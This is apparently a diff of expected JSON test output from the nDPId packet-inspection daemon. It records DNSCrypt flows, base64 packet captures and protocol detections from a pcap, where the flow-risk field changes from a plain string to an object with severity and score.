+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAIcpR5AAL0R55kKAAABKU9FDallAbsCCDEyBsUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739304628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":946739304628,"pkt":"ZmZmZmZmRERERERECABFAADPnjFAADcRIRzR+vEZCgAAAQG7hhQAu13p8VeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="}
 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739304629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":946739304629,"pkt":"ZmZmZmZmRERERERECABFAADPnjJAADcRIRvR+vEZCgAAAQG75+cAu\/wU8ViBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739304788,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739304788,"pkt":"ZmZmZmZmRERERERECABFAADSRcYAADIREz0pT0UNCgAAAQG7qlkAvgzwBsCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAIc6z5AAL0RYcwKAAABMw96+rLHAbsCCHDfxkkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAXc6z8gAL0RfgsKAAABMw96+pfTAbsGBFECxkYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":84,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAABQ6z8Aub0Rot4KAAABMw96+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":84,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAXc60AgAL0RfgoKAAABMw96+uk9AbsGBP+VxkgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":86,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAABQ60AAub0Rot0KAAABMw96+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":86,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAIc60FAAL0RYckKAAABMw96+o88AbsCCHDfxkcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
